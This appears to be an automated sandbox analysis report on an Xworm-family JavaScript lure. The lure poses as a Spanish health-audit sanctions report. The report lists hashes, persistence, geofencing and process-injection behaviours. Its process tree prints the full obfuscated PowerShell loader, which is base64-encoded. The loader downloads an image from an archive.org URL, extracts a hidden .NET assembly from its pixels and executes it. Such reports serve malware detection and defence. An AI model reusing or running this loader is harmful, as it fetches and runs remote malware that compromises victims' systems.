Analysis
-
max time kernel
103s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20250610-en -
resource tags
arch:x64arch:x86image:win10v2004-20250610-enlocale:en-usos:windows10-2004-x64system -
submitted
02/07/2025, 18:52
Static task
static1
Behavioral task
behavioral1
Sample
NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
Resource
win10v2004-20250610-en
General
-
Target
NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
-
Size
19KB
-
MD5
9f6c707c6678a8c0bf0d1fe1412b26a6
-
SHA1
3c6425c1a5dbfe0a425ee46cc1a4b9a4f8fb8ed1
-
SHA256
0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1
-
SHA512
c8c469d76efbde71a296f7c59537b58475a6359e823ac6800e5bc0c1b1f6f442b665fd4d0401f55da8cc8426002d686ed7af6046a22ae38f6bbec173c3127b29
-
SSDEEP
192:QTV70IM2f2BWAK/Mbk2B6BnLWlxj4eO05VG8IUZYDanl:0V1M2+M+bdYNc7v1IUyDo
Malware Config
Extracted
https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg
https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4000-20-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 6 IoCs
flow pid Process 3 2948 wscript.exe 8 1328 powershell.exe 37 1328 powershell.exe 38 4388 WScript.exe 43 2220 powershell.exe 61 2220 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1328 powershell.exe 2220 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1328 set thread context of 4000 1328 powershell.exe 105 PID 2220 set thread context of 1452 2220 powershell.exe 116 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 2220 powershell.exe 2220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 4000 jsc.exe Token: SeDebugPrivilege 1452 jsc.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2948 wrote to memory of 1328 2948 wscript.exe 89 PID 2948 wrote to memory of 1328 2948 wscript.exe 89 PID 1328 wrote to memory of 5380 1328 powershell.exe 99 PID 1328 wrote to memory of 5380 1328 powershell.exe 99 PID 924 wrote to memory of 4388 924 cmd.exe 103 PID 924 wrote to memory of 4388 924 cmd.exe 103 PID 1328 wrote to memory of 3852 1328 powershell.exe 104 PID 1328 wrote to memory of 3852 1328 powershell.exe 104 PID 1328 wrote to memory of 3852 1328 powershell.exe 104 PID 1328 wrote to memory of 4000 1328 powershell.exe 105 PID 1328 wrote to memory of 4000 1328 powershell.exe 105 PID 1328 wrote to memory of 4000 1328 powershell.exe 105 PID 1328 wrote to memory of 4000 1328 powershell.exe 105 PID 1328 wrote to memory of 4000 1328 powershell.exe 105 PID 1328 wrote to memory of 4000 1328 powershell.exe 105 PID 1328 wrote to memory of 4000 1328 powershell.exe 105 PID 1328 wrote to memory of 4000 1328 powershell.exe 105 PID 4388 wrote to memory of 2220 4388 WScript.exe 106 PID 4388 wrote to memory of 2220 4388 WScript.exe 106 PID 2220 wrote to memory of 1452 2220 powershell.exe 116 PID 2220 wrote to memory of 1452 2220 powershell.exe 116 PID 2220 wrote to memory of 1452 2220 powershell.exe 116 PID 2220 wrote to memory of 1452 2220 powershell.exe 116 PID 2220 wrote to memory of 1452 2220 powershell.exe 116 PID 2220 wrote to memory of 1452 2220 powershell.exe 116 PID 2220 wrote to memory of 1452 2220 powershell.exe 116 PID 2220 wrote to memory of 1452 2220 powershell.exe 116
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"3⤵PID:5380
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵PID:3852
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\agnosticism.js1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\agnosticism.js"2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD54603c253796ff07ae786a16894b49206
SHA14c15e20377d861717b0668c1571ca6ad2f773fe6
SHA256e2d57c03c72f56be9c7ed107864003befae22a7498ee40bd21ed4e63481c4afe
SHA512cc9d0aa73b231bc9979b0c1f38a09e549d927caf5bbfe8fd088feabbdd651d0beb301ef1825e027437bdae45eddc26ae03b5bba2e25976051526b47e657f19f7
-
Filesize
1KB
MD581fba9af5c9fbee260bee735e50ffb93
SHA110648671e56e56b52e0ca50063f0493949e595fb
SHA256c8e4c56c301eb93c1f3eca54652687455776b2262f5d74b78326c6829b0b16fa
SHA5127c973376c1006b4ec7747b65f66017927ddf49bf4dcbed440f82f4511e72a344f6a4d980d41e2a2d19ca5c2ad11952644fa4dfbe98902240a449befa0c0dd710
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
19KB
MD59b49b1a2e0327767db6dc4883654dd22
SHA1486be1d6c5d4f2f6d7b80613aeae32ed3a7a69ba
SHA256761b67f0715d7f89c50cdb2dd4a18a49952a21d301907bafbaf0942179afdb30
SHA512b473926aa77d0827eefeafc7ee8a59989e936ef3c0b7b316b0ab5eb7a34a993c2734419c7a80c8505904dcdb31c672156f33fe6e26084b3d8e8c1b565f6bc206